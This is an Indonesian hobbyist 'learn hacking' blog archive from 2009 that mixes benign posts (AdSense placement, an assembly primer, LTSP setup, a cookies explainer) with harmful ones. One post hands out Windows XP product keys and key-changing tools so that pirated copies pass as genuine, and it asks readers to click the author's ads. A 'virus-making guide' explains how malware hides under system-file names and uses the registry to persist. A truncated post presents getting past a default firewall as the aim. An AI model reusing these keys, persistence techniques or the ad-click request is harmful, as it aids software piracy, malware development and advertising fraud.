BELAJAR HACKING

2010-09-06T20:30:00.001-07:00

meletakkan adsense di atas postingan

2009-05-18T10:10:00.000-07:00

banyak cara yg beredar tentang cara meletakkan adsense di atas postingan.
namun saya sarankan untuk tidak merubah sedikitpun kode ads yg ada, apalagi jika menghapus salah satu kode ads nya,,disini saya akan menjelaskan bagaimana cara agar adsense kita berada di atas postingan.
logikanya kode adsense kita letakkan di teplate sehingga setiap awal postingan kamu akan nongol adsense.
untuk itu kita perlu menparse kode adsense kita.
klo kamu g ngrti parse g usah pusing,,ada tool online yg menyediakan jasa ini. :$
silahkan minta tulung di sini http://www.blogcrowds.com/resources/parse_html.php
secara umum kode adsense kita akan seperti ini..

<script type="text/javascript">
</script>
<script
src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>

setelah itu anda login ke blogger,
layout>>
edit html>>
expand widget>>
nah kemudian untuk memposisikan di atas postingan kamu harus mencari kode ini

setelah itu copas kode yg sudah di parse tadi tepat di bawah kode ini..

nah kemudian save..
lihat hasilnya,,
tweng tweng.. muncul khan??
hampir mirip dengan postingan sebelumnya meletakkan adsense di akhir postingan..

Trik Merubah Windows XP menjadi GENUINE (Asli)

2009-05-05T05:19:00.000-07:00

Mungkin kebanyakan pemakai windows XP di Indonesia menggunakan windows XP bajakan. Tapi
bukan berarti windows XP bajakan itu bukan asli (GENUINE). Yang membedakan asli atau tidaknya
windows XP ternyata terletak pada serial number yang digunakan ketika proses menginstall windows
XP.
Untuk mentes apakah windows XP kita asli, coba gunakan tool “Microsoft Genuine Advantage
Diagnostic Tool”, yang dapat mendetaksi keaslian windows XP anda, contohnya gua peke windows
bajakan tapi menggunakan serial number yang genuine so, tool “Microsoft Genuine Advantage
Diagnostic Tool” bilang kalo windows xp yang gua pake itu Asli, ini buktinya :
Download Tool Genuine disini :

http://unrated.110mb.com/Tool.zip

Kalo ternyata windows XP yang kita gunakan bukan genuine, so gak perlu kawatir. Gua dah dapet 3
serial number windows Xp yang udah terbuakti genuine :

V2C47-MK7JD-3R89F-D2KXW-VPK3J
H689T-BFM2F-R6GF8-9WPYM-B6378
WCBG6-48773-B4BYX-73KJP-KM3K3

Tapi masalahnya kalo kita males nginstall ulang windows, gunain aja Aplikasi Keyfinder buatan Jelly
Bean yang bisa buat merubah serial number windows Xp, so gak perlu cape- cape nginstall ulang.
Download Keyfinder disini :

http://unrated.110mb.com/keyfinder.zip

SELAMAT BEREXPERIMEN KALO DAH BERHASIL JANGAN LUPA KLIK IKLAN ADSENSEKU YAH DI BAGIAN ATAS BLOGKU INI....HEHHEEE

Apa dan Mengapa AntiHackerlink makin berkembang

2009-04-29T05:01:00.000-07:00

1. Semakin banyaknya pengguna Internet di Indonesia baik dalam bentuk warnet ataupun pengguna Internet rumahan yang membuat para orang Indonesia semakin bersemangat dalam mengenal lebih jauh dunia cyber.

2. Semakin banyaknya orang Indonesia yang sudah mulai menilai pelayanan Internet seperti email umum, chat yang umum (seperti hanya cari teman), ataupun hanya sekedar surfing biasa. Membuat mereka hanya menghabiskan "kocek" mereka dan rata - rata orang yang sudah merasakan seperti ini (seperti saya) akan beralih ke sesuatu yang lebih berguna dan yang mereka awam seperti dunia menghack salah satunya. Orang seperti ini akan mengalihkan perhatian mereka dalam dunia Mailinglis (Diskusi Internet) yang otomatis mereka akan mendapatkan ilmu yang mereka ingini.

3. Banyaknya media - media yang memberitahukan kabar tentang "core of Indonesian hackers" AntiHackerlink, seperti detik.com, dan juga beberapa majalah komputer Indonesia maupun tabloid komputer Indonesia, baik dalam pemberitaan keburukan mereka maupun kebaikan mereka (tetapi kebanyakan keburukan mereka), yang membuat orang awam segera ingin mencoba. Dan juga pengaruh film di televisi seperti The Net dan juga da film yang menceriterakan perang antara Kevin Mitnick dengan Tsutomu Shimomura (maaf saya lupa judul filmnya) yang diangkat dari kisah nyata kisah perang cyber terhebat pada zaman ini.

4. Banyaknya orang - orang yang ingin unjuk gigi keahlian mereka dalam menghack, semakin banyak orang yang seperti ini semakin besar dan harum nama AntiHackerlink karena rata - rata untuk menghack mereka akan join channel AntiHackerlink.

5. Tertangkapnya hC- (hantu Crew-) di Singapura dan juga berita pemberitaan mundurnya hC- dalam dunia menghack Indonesia yang membuat orang bertanya apa dan mengapa ini bisa terjadi dalam kegiatan AntiHackerlink.

6. Semakin banyaknya site yang sudah terhack oleh "Core of Indonesian hackers" AntiHackerlink seperti dari kecil dan juga yang besar yang membuat nama mereka masuk dalam searcengine seperti yahoo.com, anda tinggal mengetikkan AntiHackerlink maka anda akan mendapatkan banyak berita seperti hC- pendiri AntiHackerlink hingga terbobolnya ITB oleh hC- yang identik dengan AntiHackerlink.

7. Semakin banyaknya orang Indonesia yang ingin disebut dalam jajaran hacker.

8. Belum adanya Cyber Law di Indonesia untuk melarang kegiatan seperti ini yang katanya merupakan suatu kejahatan seperti di negara lain yang mempunya Cyber Law.

9. Pengaruh keadaan Indonesia yang membuat banyak orang banyak ingin beralih ke bidang yang masih asing.

AntiHackerlink memang suatu channel yang unik dalam perkembangan dunia Internet Indonesia memang bukan suatu tolok ukur jika kemajuan dunia TI suatu negara bukan dari banyaknya hacker di negaranya, namun memang bukan berarti penilaian seperti ini selalu benar, karena saya pikir semakin banyaknya hacker adalah salah satu imbas dari kemajuan TI di negara tersebut. Kalau menurut saya kita patut berterima kasih kepada anak - anak AntiHackerlink dan juga channel hacker Indonesia yang lainnya, karena kepada merekalah Indonesia yang sedang terbaring mulai dibangkitkan dalam dunia maya walaupun banyak orang yang menilai jika tindakan seperti mereka adalah kriminal, tetapi saya juga tidak bisa menyalahkan kepada yang memberi tanggapan seperti itu, tetapi saya sarankan, anda membaca kutipan manifesto The Mentor.

"This is our world now...the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt cheep if it is wasn't run by rofiteering gluttons, and you calls us criminals. We explore...and you call us criminals. We exist without skin color, without nationality, without religious bias...and you call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to make us believe it is for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they look lie. My crime is that of out smarting you, something that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this individual, but you can't stop us all...after all, we're all alike"

(Dari "The Conscience of a hacker", Phrack vol. 1, edisi 7, file 3)

Menjadi seorang hacker bukanlah merupakan sesuatu yang jahat, namun bukan sesuatu yang baik pula. Menjadi hacker bukanlah merupakan suatu hal yang salah namun bukan sesuatu yang benar juga. Hacker hanyalah sebuah nama yang mempunyai pembagian banyak aliran yang membuat nama hacker (dalam hal ini penulis menyebutkan "hacker" adalah hacker yang sejati) semakin terpuruk dalam pencapan sebagai kriminalis jaringan dengan lahirnya "Cracker" (hacker aliran hitam), "Cyber Punk", "Samurai" (hacker bayaran), "Phreaker", "Newbie" adalah nama - nama yang semakin menenggelamkan nama "Hacker Sejati", saya sendiri juga belum cukup mempunyai informasi apakah AntiHackerlink termsuk dalam golongan yang mana, apakah AntiHackerlink juga terdiri dari semua golongan hacker. Namun yang saya tanggapi untuk saat ini di Indonesia hacker adalah seorang pahlawan yang belum mempunyai medan perang yang asli untuk bertempur, dan untuk saat ini menurut saya hacker adalah permata bangsa kita yang masih berharga untuk beberapa tahun mendatang.

AntiHackerlink sebagai salah satu channel besar akan kegiatan menghack di Indonesia ingin membuka kepada mata dunia umumnya dan mata bangsa Indonesia khususnya agar mereka (pemerintah) bisa melihat mana yang disebut kerjasama yang dianggap benar dalam menyelesaikan suatu masalah, (mohon maaf bila salah ucap, tapi tolonglah hargai keberadaan hacker khususnya AntiHackerlink) yang membuat jarak bukan menjadi masalah dan SARA bukan suatu problema dalam menyelesaikan suatu masalah.

AntiHackerlink juga merupakan protes dari pengagum TI bahwa mereka mencoba berteriak minta tolong kepada pemerintah untuk menghargai science dan untuk mengutamakan pendidikan dalam membangun bangsa Indonesia karena saya beranggapan suatu negara maju jika negara itu percaya Tuhan dan memajukan pendidikannya. Terima Kasih kepada seluruh personel AntiHackerlink yang membuat saya akan terus menyebarkan informasi kepada seluruh netter di Indonesia....

Pengenalan Assembly

2009-04-29T03:41:00.000-07:00

1. Apakah Sebenarnya Bahasa Assembly itu?

-------------------------------------------

Bahasa Assembly (Assembler) adalah merupakan salah satu dari sekian banyak bahasa pemrograman yang tergolong dalam Bahasa Pemrogaman Tingkat Rendah (Low Level Language) dan hanya setingkat diatas bahasa mesin (Machine Language).

2. Mengapa Assembly?

----------------------

Assembly memiliki kelebihan yang tidak dapat digantikan oleh bahasa pemrogaman manapun. Diantaranya adalah :

- Hasil program memiliki tingkat kecepatan yang tinggi.

- Ukuran dari program kecil.

- Sangat mudah untuk mengakses Sistem Komputer.

3. Apakah Segment dan Offset itu?

-----------------------------------

Segment dan Offset merupakan suatu angka 16 bit (direpresntasikan dalam bilangan hexa) yang menunjukkan suatu alamat tertentu di memory komputer. Pasangan segment : offset ini disebut juga alamat relatif. Selain alamat relatif, terdapat juga alamat mutlak berupa angka 20 bit (juga direpresentasikan dalam bilangan hexa). Alamat mutlak ini dapat dihitung dengan mengalikan segment dengan 10 hexa dan ditambahkan dengan offset.

Contoh : segment : offset

0100 : 1234

Alamat relatifnya adalah : 02234

4. Apakah Interrupt itu?

--------------------------

Interrupt adalah permintaan kepada microprocessor untuk melakukan suatu perintah. Ketika terjadi permintaan interupsi, microprocessor akan mengeksekusi interrupt handler , yaitu suatu program yang melayani interupsi. Setitap interrupt handler itu memiliki alamat masing - masing yang disimpan dalam bentuk array yang masing - masing terdiri dari 4 byte (2 offset dan 2 segment). Array ini disebut vektor interupsi . Vektor interupsi ini disusun berdasarkan nomor interupsi yaitu dari hexa. Selain itu, dikenal juga istilah service dan subservice, maksudnya adalah bahwa setiap interrupt itu dibagi menjadi beberapa bagian yang mempunyai tugas masing - masing. Tetapi ada juga interrupt yang tidak memiliki service, contohnya int 29.

5. Apakah Register itu?

-------------------------

Register adalah merupakan sebagian memory dari microprocessor yang neniliki kecepatan sangat tinggi. Dapat juga dianalogikan bahwa register merupakan kaki tangan dari microprocessor.

Register dibagi menjadi lima bagian besar yaitu :

1. Segment Register (16 bit)

Register untuk menunjukkan alamat dari suatu segment. Yang termasuk register segment :

. CS (Code Segment)

Menunjukkan alamat segment dari program yang sedang aktif.

. DS (Data Segment)

Menunjukkan alamat segment dari data program (variabel).

. SS (Stack Segment)

Menunjukkan alamat segment dari stack yang digunakan program.

. ES (Extra Segment)

Merupakan register segment cadangan.

2. Pointer dan Index Register (16 bit) Register untuk menunjukkan alamat dari suatu offset.

Yang termasuk register pointer dan index :

. SP (Stack Pointer)

Berpasangan dengan SS (SS : SP).

. BP (Base Pointer)

Berpasangan dengan SS (SS : BP).

. DI (Destination Index)

Berpasangan dengan ES (ES : DI). Dipakai untuk operasi string.

. SI (Source Index)

Berpasangna dengan DS (DS : SI). Dipakai untuk operasi string.

3. General Purpose Register (16 bit)

Register ini dapat digunakan untuk berbagai keperluan, tetapi masing - masing juga memiliki fungsi khusus. Jenis register ini memiliki ciri khas, yaitu dapat dibagi lagi menjadi register 8 bit, register tinggi/high, dan register rendah/low.

Yang termasuk register general purpose :

. AX --> AH|AL (Accumulator)

Untuk menangani operasi arithmatika.

. BX --> BH|BL (Base)

Untuk menunjukkan alamat offset.

. CX --> CH|CL (Counter)

Untuk looping, menunjukkan berapa kali looping terjadi.

. DX --> DH|DL (Data)

Untuk menampung sisa pembagian bilangan 16 bit.

4. Index Pointer Register (16 bit)

Hanya terdiri dari 1 register yaitu IP yang berpasangan dengan reguster CS (CS : IP) untuk menunjukkan alamat instruksi selanjutnya yang akan dieksekusi.

0125. Flags Register (1 bit)

Register ini berfungsi untuk menunjukkan suatu kondisi (ya atau tidak).

Register ini hanya bernilai 0 dan 1.

Yang termasuk register flags :

. OF (Overflow Flag) 1 jika terjadi overflow

. SF (Sign Flag) 1 jika digunakan bilangan bertanda

. ZF (Zero Flag) 1 jika hasil operasi bernilai 0

. CF (Carry Flag) 1 jika operasi menghasilkan carry

. PF (Parity Flag) 1 jika hasil operasi bilangan genap

. DF (Direction Flag) 1 jika alur proses alur proses menurun pada string

. IF (Interrupt Flag) 1 jika proses dapat diinterupsi

. TF (Trap Flag) 1 jika dapat ditrace / debug

. AF (Auxiliary Flag) digunakan pada operasi bilangan BCD

. NT (Nested Task) digunakan untuk menangani interupsi beruntun

. IOPL (I/O Protection Level) digunakan untuk mode proteksi (2 bit)

6. Bagaimana memulai Assembly?

---------------------------------

Bahasa assembly tidak seperti bahasa tingkat tinggi (High Level Language) yang biasanya memiliki IDE - Integrated Development Environment, bahasa assembly dapat diketikkan dalam berbagai macam editor teks, misalnya BC, TC, TURBO, NOTEPAD, EDIT, dan editor teks lainnya. Yang perlu diingat bahwa ekstensi dari program assembly haruslah .ASM. Setelah program assembly diketikkan dan disimpan dengan ekstensi .ASM, maka program tersebut harus dikompilasi menjadi Object File berekstensi .OBJ, dan kemudian harus dilink menjadi executable file (.EXE/.COM), executable file inilah yang baru dapat dijalankan.

Untuk mengcompile : C:\TASM

Untuk melink : C:\LINK

C:\Option /t untuk melink file ke .COM

C:\Untuk melink menjadi .EXE, hilangkan option /t ini.

atau pake cara langsung :

7. Apakah Perbedaan .COM dan .EXE?

------------------------------------

Perbedaan program .COM dan .EXE adalah :

Program .COM Program .EXE

- Hanya menggunakan 1 segment untuk º - Menggunakan banyak segment.

- code, data, dan stack. º

- Ukuran program relatif kecil º - Ukuran program relatif besar

- Hasil program lebih cepat º - Hasil program lebih lambat

- Hanya dapat menangani program kecil º - Dapat menangani program yang besar(<=64 KByte).

8. Bagaimana Struktur Program .COM?

-------------------------------------

Untuk .COM dan .EXE memiliki struktur program yang berbeda, untuk kesempatan ini hanya akan dibahas struktur program .COM.

Berikut ini struktur program .COM (tanda ; adalah untuk komentar) :

nama_segment segment ; nama_segment diisi terserah anda

; Baris ini untuk memberikan nama sebuah segment

assume cs : nama_segment ; Menunjukkan CS ke segment yang sudah kita beri nama

org 100h ; Untuk PSP - Program Segment Prefix

; PSP ini digunakan untuk berhubungan dengan DOS

label_pertama : ; Di Assembly, minimal harus ada satu label,

; penamaan label terserah anda

mov ah,04ch ; service

int 21h ; int 21h service 04ch merupakan instruksi untuk

; keluar dari program

nama_segment ends ; Akhir dari sebuah segment

end label_pertama ; Label yang paling pertama harus ditutup dengan perintah ini

9. Bagaimana Variabel dalam Assembly?

--------------------------------------

Dalam assembly dikenal beberapa jenis data, yaitu :

- db (define byte) --> Besarnya 1 byte (0h - FFh)

- dw (define word) --> Besarnya 2 byte (0h - FFFFh)

- dd (define double word) --> Besarnya 4 byte (0h - FFFFFFFFh)

- df (define far word) --> Besarnya 6 byte (0h - FFFFFFFFFFFFh)

- dq (define quad word) --> Besarnya 8 byte (0h - FFFFFFFFFFFFFFFFh)

- dt (define temp word) --> Besarnya 10 byte (0h - FFFFFFFFFFFFFFFFFFFFh)

10. INT, MOV, JMP, dan LEA

----------------------------

INT

---

INT adalah perintah untuk melaksanakan suatu interupsi.

Syntaxnya adalah : INT no_interupsi

Contoh : INT 20h ; untuk program terminate

MOV

---

mOV adalah perintah untuk mengisi nilai ke register, variabel, atau alamat memory tertentu.

Syntaxnya adalah :MOV destination,source

Contoh : MOV AX,5 ; nilai AX akan berisi 5

JMP

---

JMP adalah perintah untuk melakukan lomptan ke label tertentu.

Syntaxnya adalah : JMP nama_label

Contoh : JMP label1 ; Program akan melompat ke label1

LEA

---

LEA adalah perintah untuk mendapatkan alamat dari sebuah variabel.

Syntaxnya adalah : LEA variabel

Contoh : lea si,bil1 ; si akan berisi offset bil1

11. Tambahan

--------------

Beberapa hal penting yang perlu diingat :

. Bagian deklarasi variabel tidak boleh dijalankan, harus dilewati dengan melakukan lompatan ke label setelahnya.

. Semua perintah assembly yang membutuhkan 2 operand seperti MOV memiliki syarat sebagai berikut :

- Kedua operand besarnya harus sama.

Contoh : MOV ax,bl ; ini salah karena AX 16 bit dan bl 8 bit

MOV al,bl ; ini benar, AL dan BL besarnya 8 bit

- Kedua operand tidak boleh keduanya variabel

Contoh :

MOV a,b ; ini salah, kedua operand a dan b adalah variabel

MOV al,b ; kedua perintah ini untuk menggantikan perintah

MOV a,al ; yang salah diatas

- Register segment tidak boleh diisi langsung, harus menggunakan perantara

Contoh :

MOV es,0b800h : salah, es tidak boleh diisi langsung

MOV ax,0b800h ; kedua perintah ini untuk menggantikan perintah

MOV es,ax ; yang salah diatas

. Untuk intterupt, ingatlah bahwa setiap interrupt memiliki syarat - syarat sebelum dipanggil. Penuhi syarat - syarat itu sebelum melakukan intterupt.

12. Contoh Program Sederhana

------------------------------

Program berikut ini akan membersihkan layar, kemudian akan muncul sebuah kalimat dan akan diminta untuk memasukkan sebuah karakter. Kemudian akan ditampilkan lagi sebuah kalimat diikuti dengan karakter yang tadi dimasukkan. code segment

assume cs : code

org 100h

begin : jmp start

kal1 db 'Masukkan sebuah karakter : $'

kal2 db 10,13,'Karakter yang anda masukkan adalah : $'

kar db ?

start : mov ah,0

mov al,3h

int 10h

mov ah,9h

lea dx,kal1

int 21h

12mov ah,1h

int 21h

mov kar,al

mov ah,9h

lea dx,kal2

int 21h

mov al,kar

int 29h

mov ah,4ch

int 21h

code ends

end begin

Simpanlah program diatas dengan ekstensi .asm (misal test.asm), kemudian compile program tersebut dengan perintah :

tasm

misal : tasm test.asm

Maka akan dihasilkan sebuah object file berekstensi .obj, kemudian link file tersebut dengan perintah :

tlink /t

misal : tlink /t test.obj

Maka akan dihasilkan sebuah file berekstensi .com, cobalah jalankan !

Penjelasan :

- Perhatikan baris begin : jmp start, karena baris berikutnya adalah deklarasi variabel, maka harus dilewati dengan perintah jmp start (melompat ke label start).

- Pada baris kal1 db 'Mas..... $' disini kita mendeklarasikan sebuah variabel untuk pencetakan string, ingatlah selalu untuk menambahkan tanda '$' diakhir sebuah string.

- Pada baris kal2 db 10,13,'... $' sama seperti baris sebelumnya, tetapi disini kita menambahkan 2 karakter, karakter 10 untuk turun baris, karakter 13 untuk memindahkan kursor ke awal baris.

- Pada barus start : mov ah,0 sampai baris int 10h, disini kita melakukan interupsi 10h service 0h, yaitu untuk mengganti modus layar, al berisi 3 berarti modusnya adalah teks 80 x 25. Efek yang terjadi adalah layar akan bersih.

- Pada baris mov ah,9 sampai baris int 21h (2 baris dibawahnya), kita melakukan int 21h service 9h, yaitu untuk mencetak sebuah string. Register dx harus berisi alamat dari string yang akan dicetak.

- Pada baris mov ah,1h sampai baris mov kar,al, kita menggunakan int 21h service 01h, yaitu untuk meminta input 1 karakter dan ditampilkan ke layar. Karakter yang diinput akan berada pada register al setelah interupsi dilakukan, maka kita isikan ke variabel kar dengan perintah mov kar,al

- Selanjutnya pada baris mov al,kar dan int 29h, kita menggunakan int 29h yang tidak memiliki service, fungsinya untuk mencetak 1 karakter yang ada pada register al.

note : untuk melihat nomor-nomor service-service yang terdapat pada komputer gunakan program Helppc

semoga kita semua bisa belajar jadi pintar! dan pelajaran kecil ini..

SOLUSI JARINGAN MURAH

2009-04-29T03:31:00.000-07:00

Krisis yang berkepanjangan telah menuntut kita untuk sangat berhemat, penulis disini ingin membagi ilmu tentang solusi jaringan murah berbasis linux. Dimana melalui solusi ini kita dapat menghemat beberapa ratus ribu bahkan juta di dalam membeli peripheral komputer.

Yang ingin penulis tawarkan ialah jaringan LTSP (Linux Terminal Server Project), dimana dengan ini kita dapat membuat sebuah workstation yang terhubung dengan sebuah server LTSP tersebut. Workstation yang kita miliki cukup menggunakan 2 buah alat penting yakni LAN Card dan floppy disk (tidak perlu harddisk). Jadi keseluruhan dari workstation akan langsung mengakses ke server yakni LTSP server itu sendiri yang telah terinstall.

File-file installasi yang diperlukan yang paling mendasar ialah :
1. ltsp_core
2. ltsp_kernel
Keduanya dapat di download pada http://prdownloads.sourceforge.net/ltsp/. Ada beberapa format paket yang dapat kalian pilih, sesuaikan dengan kebutuhan. Setelah di download kalian dapat menginstallnya satu per satu pada komputer yang akan dijadikan server bagi LTSP.

Kemudian setelah terinstall keduanya, kalian dapat mengkonfigurasi file-file yang ada pada /otp/ltsp/templates. Bagi yang tidak sabar dapat langsung mengeksekusi file berikut untuk mengkonfigurasi server LTSP yang telah terinstall, sebagai berikut :

cd /opt/ltsp/templates
./ltsp_initialize
pilih Apply

Bagi yang ingin mengetahui informasi file apa saja yang akan dikonfigurasi dapat memilih review setelah eksekusi ltsp_initialize.

Setelah konfigurasi selesai kalian dapat menkonfigurasi workstation kalian melalui server LTSP pada file-file berikut :
1. /etc/dhcpd.conf
2. /etc/hosts
3. /opt/ltsp/i386/etc/lts.conf

Keterangan:

1. /etc/dhcpd.conf

Disini saya menganggap kalian telah mengerti apa itu DHCP (kalau belum silakan lihat http://www.cs.unm.edu/~vuksan/linux/DHCP.html). Setelah ltsp_core dan ltsp_kernel terinstall biasanya diikut sertakan file dhcpd.conf.example sebagai contoh. Silakan disesuaikan konfigurasinya dengan workstation kalian.

2. /etc/hosts

Berfungsi untuk mapping IP address kepada hostname komputer. Bisa juga disebut sebagai resolver.

3. /opt/ltsp/i386/etc/lts.conf

File ini berisi konfigurasi dari LTSP mulai dari no IP server dan, run level dan sebagainya.

Ada dua cara dimana workstation tersebut dapat booting melalui jaringan. Yakni :
1. Menggunakan BOOT ROM yang telah terdapat pada tiap-tiap network card sekarang,
2. Menggunakan boot floopy (disinilah fungsi dari floopy drive).

Disini penulis menggunakan boot floopy. Keduanya dapat di download pada http://www.rom-o-matic.net.

Panduan Membuat Virus : Infeksi System

2009-04-27T03:54:00.000-07:00

Jika kita tanpa sengaja menjalankan/membangkitkan suatu virus (Virus
Komputer). Maka yang pasti dilakukan virus tersebut setelah bangkit dari tidurnya
adalah menginfeksi system yang ada pada computer target agar virus tersebut melekat
pada computer target. Sehingga meskipun komputer tersebut telah di-restart virus
tersebut akan tetap aktif dikomputer target tersebut.

Cara kerja virus menginfeksi system:
1. Melakukan penggandaan ke system.
Langkah pertama sekali yang dilakukan oleh kebanyakan virus ketika user
menjalankan virus dikomputernya adalah melakukan penggandaan kesistem
user tersebut. Proses penggandaan ke system tersebut berfungsi agar virus
tetap aktif pada saat computer direstart. Biasanya hasil penggandaan ke
system mempunyai nama yang hampir dengan nama file system dan ada juga
yang sama dengan nama file system hanya saja lokasi file tersebut berbeda
dengan file aslinya. Contoh (winlogon.exe, lsass.exe, services.exe, csrss.exe,
iexplorer.exe, shel .exe, dll).
2. Menyeting registry.
Setelah virus tersebut berhasil menggandakan dirinya kesistem barulah virus
tersebut menggunakan registry sebagai benteng pertahanan. Kok
menggunakan registry, seharusnya virus kan mampu melindungi dirinya sendiri
tanpa bantuan registry? Benar, Tapi meskipun begitu banyak sekali
kemungkinan virus tersebut dapat ditanggulangi oleh Antivirus atau software
sejenisnya. Tapi dengan meminjam bantuan registry dari system operasi maka
virus tersebut tersebut dapat melindungi dirinya dengan sangat baik.
Dikarenakan kunci system operasi ada pada registry. Dengan bantuan registry
ini virus mampu menjalankan dirinya kedalam mode safe-mode ataupun
kedalam mode safe-mode dos sekalipun. Dan melalukan pengaturan agar virus
tersebut tetap dalam keadaan tidak terlihat sehingga menyulitkan user untuk
menghapus virus tersebut secara manual.
3. Mengaktifkan virus yang telah berada disistem.
Setelah virus telah melakukan penggandaan ke system dan menyeting registry
maka yang dilakukan virus selanjutnya adalah menjalankan virus telah ada
disistem sehingga meskipun flashdisk atau pun disket tersebut dikeluarkan
maka virus tersebut akan tetap aktif.

BELAJAR HACKING : Apakah cokie dan mengapa ada di hard disk anda

2009-04-27T00:36:00.000-07:00

Cookie adalah sebaris informasi yang dipasang pada sebuah server web dalam sebuah file
di hard disk anda. Server web melakukannya melalui browser web (itu sebabnya mengapa
cookie sering kali disebut cookie browser). Cookie biasanya terdiri dari satu baris
informasi. Informasi informasi ini disimpan dalam sebuah file bernama cookies.txt,
disalah satu sub-folder browser anda.

Cookie digunakan oleh server web (komputer yang menampung situs web) untuk meletakkan
informasi di hard disk anda. Tipe informasi ini mencakup, namun tidak terbatas pada,
user ID dan password, tanggal dan waktu anda mengunjungi situs web, halaman yang
ditampilkan, dan banyak lagi.

Sejumlah pengguna cookie menguntungkan pengunjung situs web. misalnya, sebuah user ID dan
password yang disimpan pada file cookies.txt bisa membawa anda ke sebuah situs yang meminta
informasi ini tanpa anda harus mengetikkannya setiap kali. Sebuah daftar preferences untuk
sebuah situs web yang berisi cookie bisa mengkustomasi penampilan informasi. Cookie juga
digunakan untuk menyimpan item pada kereta belanja virtual. (jika anda pernah mengunjungi
sebuah situs belanja dan memesan sejumlah item, lalu meninggalkannya tanpa melengkapi pemesanan
anda, lalu kembali dilain waktu dan mendapatkan daftar item yang sudah anda pilih sebelumnya,
ini berkat informasi yang disimpan pada file cookies.txt untuk 'membuat kembali' daftar belanja
anda).

Demikian juga, file file ini mungkin menyimpan catatan halaman apa yang telah andakunjungi
disebuah situs, lalu menggunakan informasi ini untuk mengingatkan server untuk memberikan anda
acces ke halaman halaman baru dan melarang acces ke halaman halaman yang sebelumnya telah
dikunjungi. Setup seperti ini mungkin digunakan untuk mengumpulkan dan menyimpan data survei
(poll), yang mencegah setiap orang mengikuti survei 2 kali.

File cookies.txt ditampilkan pada setiap server yang memintanya. Namun, banyak informasi pada
sebuah cookie hanya berguna bagi server yang menempatkan cookie tersebut, atau bagi server
lain yang oleh pemilik/penulis cookie diberi ijin untuk menggunakan informasi tersebut.

File cookies.txt adalah file text ASCII 7-bit. Anda bisa membuka file dengan program pengolah
kata. bentuknya akan tampak seperti ini:

contoh:

#Netscape HTTP Cookie file
#http://www.netscape.com/newsref/std/cookie_spec.html
#This is generated file! Do not edit.

.amazon.com TRUE / FALSE 2082787568 x-main nIDfTAYzJDky5V6rp9
K6UZsS915ULEq4
.amazon.com TRUE / FALSE 2082787240 ubid-main
077-2649831-7662731
ad1.impulsebuy.net FALSE / FALSE 1072914778 IASIDX

Anda melihat kata, 'do not edit' di dekat akhir file. pengeditan file ini akan membuatnya tidak
berguna. Jika anda menggunakan file cookie untuk menyimpan password dan informasi lain yang
berhubungan dengan cara anda menggunakan sebuah situs web, anda tentu tidak boleh mengedit file
ini. Jika anda melakukannya, server disitus web yang dimaksud tidak akan bisa membaca informasi
yang disimpan pada file cookie, sehingga informasi tersebut tidak akan bisa diisikan secara
otomatis untuk anda ketika anda mengunjungi situs tersebut. Namun, juka anda mengedit file
tersebut, anda akan tetap bisa mengakses situs tersebut dengan memasukkan ID dan password anda
secara manual. seperti mungkin anda sudah duga, cookies.txt berisi informasi tempat tempat yang
sudah anda kunjungi. Sehingga, anda mungkin perlu untuk sepenuhnya menonaktifkan cookies, kalau
kalau seorang 'pengintip' di PC anda memutuskan untuk melihat file cookies.txt

Udah jelas khan? apa mungkin saya yang terlalu panjang lebar, (males banyak bacot!)

Ada dua pendekatan untuk menghentikan/memblock cookie. yang pertama langsung, dan mencakup
penghapusan file cookies.txt. lainnya menggunakan fasilitas yang disediakan netscape dan
microsoft internet explorer/IE untuk menghentikan atau mengontrol cookie.

Salah satu pendekatan untuk menangani cookie adalah dengan menghapus atau mengedit file bernama
cookies.txt yang oleh browser anda diletakkan di hard disk anda. saya tidak merekomendasikan hal
ini karena ini sangat membuang waktu, dan anda harus menghapusnya, atau mengubahnya setiap
kali selesai mem-browse web.

Namun, jika anda ingin mengontrol cookie dengan cara ini --atau hanya ingin melihat apa yang ada
di file tersebut-- ini merupakan langkah sederhana. Bergantung pada setup PC anda, browser yang
anda gunakan, dan versi browser, file ini bisa diletakkan pada salah satu dari beberapa
direktori; jadi anda harus mencari terlebih dahulu.

Untuk mencari cookies.txt, gunakan fasilitas pencarian computer anda. Klik find pada menu start,
lalu klik Files atau Folders. Anda akan melihat kotak dialog find. lalu masukkan kata cookies.txt,
dan klik find now atau tekan enter untuk mengetahui lokasi file cookies.txt anda bisa menghapus
atau menampilkan file dari dialog ini menggunakan menu klik kanan.

BELAJAR HACKING : Bermain dengan Firewall Default

2009-04-27T00:30:00.000-07:00

Selama ini mungkin anda beranggapan bahwa firewall adalah suatu dinding
penjaga keamanan dari sebuah network yang tidak mungkin ditembus.
Sayangnya (atau untungnya - tergantung persepsi anda), banyak
administrator sistem yang malas dan mengandalkan instalasi 'default' yang
diterima (out of box).

Firewal-firewall seperti inilah yang mempunyai banyak kelemahan. Artikel
ini ditujukan untuk mereka yang sudah punya akses di dalam firewall, dan
membutuhkan jalan untuk mencapai akses tersebut melalui jaringan luar
(internet, contohnya). Platform yang digunakan adalah Linux dan untuk
UNIX-UNIX lainnya, cara kerja hampir sama.

Misalkan workstation anda di kantor menyimpan segala pekerjaan anda. Namun
sayangnya LAN di kantor dilindungi oleh sebuah Firewall. Anda ingin akses
ke workstation di kantor supaya anda bisa menyelesaikan pekerjaan dari
rumah atau tempat lain. Nah, disinilah bergunanya teknik 'firewall
bypassing'.

# port
/-------\ /-------\<------------ telnet (23)
| | | |<------------ ftp (21) /--------\
|kotak. |<-------| fire |<------------ ssh (22) INTERNET
|linux. | 25 | wall |<------------ www (80)
|anda |<-------| |<------------ mail (25) \--------/
| | <1024 \-------/ <----------- imap (143)
\-------/
( ilustrasi lalu lintas data dari internet ke kotak linux anda dengan
melewati firewall)

Instalasi firewall secara default biasanya mengizinkan koneksi ke port 25
(SMTP - protokol transfer e-mail), dan sebagian besar koneksi ke port
dengan nomor lebih besar daripada 1024. Memang banyak sysadmin yang
mengabaikan hal ini, ataupun jika ada yang tahu, biasanya hanya dibiarkan
saja, sebab koneksi keluar server biasa menggunakan lokasi-lokasi dengan
nomor port >1024.

Cara yang paling cepat untuk mengakali sang firewall agar bisa menerima
koneksi telnet dari luar adalah dengan mengubah setting skema portmapping
